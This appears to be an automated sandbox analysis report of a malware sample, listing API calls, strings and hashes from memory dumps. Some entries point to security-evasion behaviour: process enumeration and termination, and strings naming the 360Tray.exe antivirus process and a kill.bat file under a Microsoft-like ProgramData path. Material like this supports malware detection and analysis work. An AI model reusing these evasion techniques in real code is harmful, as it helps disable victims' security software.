FreeLibrary.KERNEL32(00000000,?,035AA979,035A5486,?,00000000,CE3BFFFF,00000000,?,035AAAF2,00000022,FlsSetValue,035B4B68,035B4B70,CE3BFFFF), ref: 035AA92B

Strings

api-ms-, xrefs: 035AA8C1
ext-ms-, xrefs: 035AA8D5

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b1419608e1a7148dea86b6fd3e63d64b56b7b8da9b6943964ee776f9c03abee1
Instruction ID: 008e2bab63105c024097873343b59b1b67640616f3b25cee4daa0dabb1cfc5da
Opcode Fuzzy Hash: b1419608e1a7148dea86b6fd3e63d64b56b7b8da9b6943964ee776f9c03abee1
Instruction Fuzzy Hash: DD210B35A05612BFCB21DA68BC40E5F777CBF41660F1A0265E951B72B1EB30E905E6D0

Function 0360A86A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0360A979,03605486,?,00000000,CE3BFFFF,00000000,?,0360AAF2,00000022,FlsSetValue,03614B68,03614B70,CE3BFFFF), ref: 0360A92B

Strings

api-ms-, xrefs: 0360A8C1
ext-ms-, xrefs: 0360A8D5

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 95259e6c659f232a5c51e86a5be8f94eb21bac7c8cc5b750e82efaff8f8890a7
Instruction ID: 5533761a81eaac07395dc50e5ee64468f42cab848c07106ee41a92fcd741b9b3
Opcode Fuzzy Hash: 95259e6c659f232a5c51e86a5be8f94eb21bac7c8cc5b750e82efaff8f8890a7
Instruction Fuzzy Hash: E1210B35B01311BBCB25DAA0DC42A5F776C9F413E0F2D0265E996A73C8EB30E901C6D0

Function 1001CB13 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 1001CB51
GetSystemMetrics.USER32(00000000), ref: 1001CB69
GetSystemMetrics.USER32(00000001), ref: 1001CB70
lstrcpyA.KERNEL32(?,DISPLAY), ref: 1001CB94

Strings

DISPLAY, xrefs: 1001CB8E
B, xrefs: 1001CB32

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: e00d1b1f04b17d28ceed1b6378be0b71e9962c91cc77dcc21488e654ac814a40
Instruction ID: cef7628ae32f3f47ee9f04d6fdccd091a13fa8a9c821e7500a35903fc029daa0
Opcode Fuzzy Hash: e00d1b1f04b17d28ceed1b6378be0b71e9962c91cc77dcc21488e654ac814a40
Instruction Fuzzy Hash: C7119EB1505228ABDB11DF648CC6E8A7BA8FF05790F108466FD09DE145D771D981CBA0

Function 1000FEB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000FEE9
GetProcAddress.KERNEL32(?,closesocket), ref: 1000FEFB
DeleteCriticalSection.KERNEL32(?,?,?,?,10025E7E,000000FF), ref: 1000FF5E
FreeLibrary.KERNEL32(00000000,?,?,?,10025E7E,000000FF), ref: 1000FF6E

Strings

ws2_32.dll, xrefs: 1000FEE4
closesocket, xrefs: 1000FEF2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Library$AddressCriticalDeleteFreeLoadProcSection
String ID: closesocket$ws2_32.dll
API String ID: 1041861973-181964208
Opcode ID: bf2c232e5b934beef7f1ec6f56e4645ba3017814867b1fb6d70cb29c65eef63f
Instruction ID: e626db4d7e73f853e938d1664f1168a244f8afcba54441b69bd211bbce0923a9
Opcode Fuzzy Hash: bf2c232e5b934beef7f1ec6f56e4645ba3017814867b1fb6d70cb29c65eef63f
Instruction Fuzzy Hash: CE2136B4D0020ACFDB10DF98C948BBEB7B1FF49354F204218E92967790C738A946CB61

Function 100048C2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 100048CD
GetSystemMetrics.USER32(00000001), ref: 100048D8
ChangeDisplaySettingsA.USER32(?,00000000), ref: 1000490F
ChangeDisplaySettingsA.USER32(?,00000001), ref: 10004927
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 10004933

Strings

, xrefs: 100048E1

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ChangeDisplaySettings$MetricsSystem
String ID:
API String ID: 840903655-3916222277
Opcode ID: 6576081e3f6366654fd76105bb346d014d4bb1054217c7f72387046fd40bb008
Instruction ID: 9b3687a401d64431fee4041ee7773e7df684152d3d959100010e46dfc339879c
Opcode Fuzzy Hash: 6576081e3f6366654fd76105bb346d014d4bb1054217c7f72387046fd40bb008
Instruction Fuzzy Hash: 6901CDB0D41318EFEB50EFA0CC49B8DBBB4FB04715F5084A8E50DA6190DBB546899F95

Function 1002418B Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 10024197
GetSysColor.USER32(00000010), ref: 1002419E
GetSysColor.USER32(00000014), ref: 100241A5
GetSysColor.USER32(00000012), ref: 100241AC
GetSysColor.USER32(00000006), ref: 100241B3
GetSysColorBrush.USER32(0000000F), ref: 100241C0
GetSysColorBrush.USER32(00000006), ref: 100241C7

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 4e6575581a41935629c37ae0b0156e85026bafe1157e36911dcb5ad206bd6f36
Instruction ID: a43b1f8c714ac03531e62601c649d211dcb8737d5329b73ec3f789689f64ac70
Opcode Fuzzy Hash: 4e6575581a41935629c37ae0b0156e85026bafe1157e36911dcb5ad206bd6f36
Instruction Fuzzy Hash: 13F0F8719407489BE720AB728D49B47BAE0FFC4B10F12092AE6858BA90E6B5A4419F50

Function 100027E8 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 27COMMON

Download Yara Rule

Strings

360tray.exe, xrefs: 100027FE
C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 10002820
360Tray.exe, xrefs: 100027EB
C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 10002811
C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 1000282F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID: 360Tray.exe$360tray.exe$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 2353314856-3263839529
Opcode ID: 5338978979c5b991dcf5ba6a9d79148cdb0310d0bd3267605b0fb895e8ee7e0c
Instruction ID: 1771cda3e80aa1263e1e9c41a79f81501c30adb3369f388c5769a81fac2baf8a
Opcode Fuzzy Hash: 5338978979c5b991dcf5ba6a9d79148cdb0310d0bd3267605b0fb895e8ee7e0c
Instruction Fuzzy Hash: 1EE086E998814422F111D2E17D47B9E3044DB307C1FA64031FE0DA018AFE17FA254073

Function 1001A6DE Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,10027834,00000001,?,74DEE860,1005A634,?,?,00000002,00000000,?,?,1001C289,?), ref: 1001A71D
GetStringTypeA.KERNEL32(00000000,00000001,10027830,00000001,?,?,?,1001C289,?), ref: 1001A737
GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,74DEE860,1005A634,?,?,00000002,00000000,?,?,1001C289,?), ref: 1001A76B
MultiByteToWideChar.KERNEL32(?,1005A635,?,00000000,00000000,00000000,74DEE860,1005A634,?,?,00000002,00000000,?,?,1001C289,?), ref: 1001A7A3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 1001A7F9
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 1001A80B

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 4a6843a9090daf03aaec5f7a6d42aa1b058f4f132befdad760c0c0325679e814
Instruction ID: fc317e8000eb5d541ebd4c6b1c8ce2f89111f616838cb00d25853e6f2453adf5
Opcode Fuzzy Hash: 4a6843a9090daf03aaec5f7a6d42aa1b058f4f132befdad760c0c0325679e814
Instruction Fuzzy Hash: 21415E71500119EFDF51CF94CC85EDE7BB9FB09690F104425FA1596190D735CA96CBA0

Function 100042DD Relevance: 9.1, APIs: 6, Instructions: 100processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Process32First.KERNEL32(?,00000128), ref: 10004323
Process32Next.KERNEL32(?,00000128), ref: 10004363
OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,00000128,000000FF,00000000,?,?,00000128,?,00000128,00000002,00000000), ref: 100043C4
TerminateProcess.KERNEL32(?,00000000), ref: 100043D9
CloseHandle.KERNEL32(?), ref: 100043E6

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ProcessProcess32$CloseCreateDecrementFirstHandleInterlockedNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2510477572-0
Opcode ID: 9cc3cbd6bcc4e14c73a718ae4f1a1d2a6a77388b02b4a7a8e4f2e12d72e7e6ea
Instruction ID: 908d2454da6341a243b0c6d021339cc72eee32acfb4ee0d75c604613779656f6
Opcode Fuzzy Hash: 9cc3cbd6bcc4e14c73a718ae4f1a1d2a6a77388b02b4a7a8e4f2e12d72e7e6ea
Instruction Fuzzy Hash: 52410774800258EBDB24DB64DC85BDDB7B4EF15350F604298F529A61D1EB70AB89CF84

Function 10004770 Relevance: 9.1, APIs: 6, Instructions: 91fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100047A1
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 100047BF
GetFileSize.KERNEL32(000000FF,00000000), ref: 100047CB
_rand.LIBCMT ref: 1000486A
WriteFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 100048A8
CloseHandle.KERNEL32(000000FF), ref: 100048B7

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerSizeWrite_rand
String ID:
API String ID: 3303813081-0
Opcode ID: 48c3b9e1aa68566f6f2ca4be634fe7fd3f86f49de793a62491e5227032152549
Instruction ID: 666d157770c7567b1e77409be7bafdb8232f87563cc1996cd86076eac92075ca
Opcode Fuzzy Hash: 48c3b9e1aa68566f6f2ca4be634fe7fd3f86f49de793a62491e5227032152549
Instruction Fuzzy Hash: 403152F1E00259DBEB24CB54CC45BEEB7B5FB44304F20C5A9E70867285CB745A858F99

Function 100252C4 Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,10058280,00000000,00000002,?,?,1002543A,10058280,00000000,?,00000100,10025029,1002506D,1002137A,00000100,10021313), ref: 100252CF
EnterCriticalSection.KERNEL32(?,00000010,?,1002543A,10058280,00000000,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?,00000100), ref: 1002531E
LeaveCriticalSection.KERNEL32(?,00000000,?,1002543A,10058280,00000000,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?,00000100), ref: 10025331
LocalAlloc.KERNEL32(00000000,00000000,?,1002543A,10058280,00000000,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?,00000100), ref: 10025347
LocalReAlloc.KERNEL32(?,00000000,00000002,?,1002543A,10058280,00000000,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?), ref: 10025359
TlsSetValue.KERNEL32(?,00000000,00000100,?,?), ref: 10025395

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 69d98f1eb5852cf894d8979c1c0f01ed67c80ea0c2ec82ead3dbf340bd771f2e
Instruction ID: ea506190159f08299b4bcb035a268125ebd3ce337a5e9b43c528ad5544b632fb
Opcode Fuzzy Hash: 69d98f1eb5852cf894d8979c1c0f01ed67c80ea0c2ec82ead3dbf340bd771f2e
Instruction Fuzzy Hash: FE31BC71200205EFE724CF18D885E5AB7F8FF44391F508519F81AC7690DBB1E915CBA0

Function 10022A6E Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10022A73
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10022AC0
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10022AE2
GetCapture.USER32 ref: 10022AF4
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10022B03
WinHelpA.USER32(?,?,?,?), ref: 10022B17

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 9959228c3e7add9ce784abbca0e238d1bac50929ba0ad60552988f764873b43d
Instruction ID: 92fbde6afad5582e6c4b0dd81e2373ab233bd5251aa11d7e8418a23b69f8f4d8
Opcode Fuzzy Hash: 9959228c3e7add9ce784abbca0e238d1bac50929ba0ad60552988f764873b43d
Instruction Fuzzy Hash: 9A219275200209BFEB21DF64DC8AEAE77B9FF48750F518168F1459B1E2CB71AD019B60

Function 10024C8A Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 10024CBD
GetLastActivePopup.USER32(?), ref: 10024CCC
IsWindowEnabled.USER32(?), ref: 10024CE1
EnableWindow.USER32(?,00000000), ref: 10024CF4
GetWindowLongA.USER32(?,000000F0), ref: 10024D06
GetParent.USER32(?), ref: 10024D14

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: d1dc0caf7cb55e725c84d356f6f5f4bb88776dcd3992baf6854861bec9745ca0
Instruction ID: 55fd02ff60ecd009f545c12300527a39e1be2f6474acc1c1fcdf72549f81a431
Opcode Fuzzy Hash: d1dc0caf7cb55e725c84d356f6f5f4bb88776dcd3992baf6854861bec9745ca0
Instruction Fuzzy Hash: 97119A32A0233257D3A1DE6DAC84B1A72FCEF55AE1FB30115ED08A7214DF60DC0242A5

Function 035A260C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,035A20E1,035A18E9,035A1308,?,035A1540,?,00000001,?,?,00000001,?,035BA370,0000000C,035A1639), ref: 035A261A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 035A2628
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 035A2641
SetLastError.KERNEL32(00000000,035A1540,?,00000001,?,?,00000001,?,035BA370,0000000C,035A1639,?,00000001,?), ref: 035A2693

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7f227647e4dfa15ae80e7bb355cde6d8b7d417b5e7d5503882461f7ed4e79442
Instruction ID: 5c665f7ef0a7f9479cd78e7829b1dc157c05a3642d33b520c3df1ebcf156a1fa
Opcode Fuzzy Hash: 7f227647e4dfa15ae80e7bb355cde6d8b7d417b5e7d5503882461f7ed4e79442
Instruction Fuzzy Hash: F701283A20EF1E5EE754B6BDFCC6A6E6668FF41674B244629E5204A0F0FF9148067284

Function 0360260C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,036020E1,036018E9,03601308,?,03601540,?,00000001,?,?,00000001,?,0361A370,0000000C,03601639), ref: 0360261A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 03602628
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03602641
SetLastError.KERNEL32(00000000,03601540,?,00000001,?,?,00000001,?,0361A370,0000000C,03601639,?,00000001,?), ref: 03602693

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: dad33ca77b7be3fef49f4d529b0774eb9c11a15671d46c6f72c0e979a7286c73
Instruction ID: 86dfb5ce013e8fcf5a638df43e81a1c1e85c7cad0baf92d1d14a95552b1f313d
Opcode Fuzzy Hash: dad33ca77b7be3fef49f4d529b0774eb9c11a15671d46c6f72c0e979a7286c73
Instruction Fuzzy Hash: CC012D3621D3152FE71CF5B4FCAA61F2758EF05772738432FE420452E8EF5148515248

Function 10017391 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,10013991,100139E5,?,?,?), ref: 100173C9
VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,10013991,100139E5,?,?,?), ref: 100173D4
HeapFree.KERNEL32(00000000,?,?,?,?,?,10013991,100139E5,?,?,?), ref: 100173E1
HeapFree.KERNEL32(00000000,?,?,?,?,10013991,100139E5,?,?,?), ref: 100173FD
VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000,?,?,10013991,100139E5,?,?,?), ref: 1001741E
HeapDestroy.KERNEL32(?,?,10013991,100139E5,?,?,?), ref: 10017430

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Free$HeapVirtual$Destroy
String ID:
API String ID: 716807051-0
Opcode ID: 6e933e9a019d1cb7c676e9ac3540b576f9d0877106f323f49e53eb1348b51183
Instruction ID: 36ddfd3c3d102e88a93c3903ab2e5b8f5085afc7001adad0e779037e8acca993
Opcode Fuzzy Hash: 6e933e9a019d1cb7c676e9ac3540b576f9d0877106f323f49e53eb1348b51183
Instruction Fuzzy Hash: 6711573664472AABE722DB14DDC5F05BBB2FB49750F228024FA486B0A0C771AC969B54

Function 1000EBCD Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,10054CD0,?,100077DB), ref: 1000EBED
FreeLibrary.KERNEL32(00000000,?,?,?,?,10054CD0,?,100077DB), ref: 1000EC03
FreeLibrary.KERNEL32(00000000,?,?,?,?,10054CD0,?,100077DB), ref: 1000EC19
FreeLibrary.KERNEL32(00000000,?,?,?,?,10054CD0,?,100077DB), ref: 1000EC2F
FreeLibrary.KERNEL32(00000000,?,?,?,?,10054CD0,?,100077DB), ref: 1000EC45
FreeLibrary.KERNEL32(00000000,?,?,?,?,10054CD0,?,100077DB), ref: 1000EC5B

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
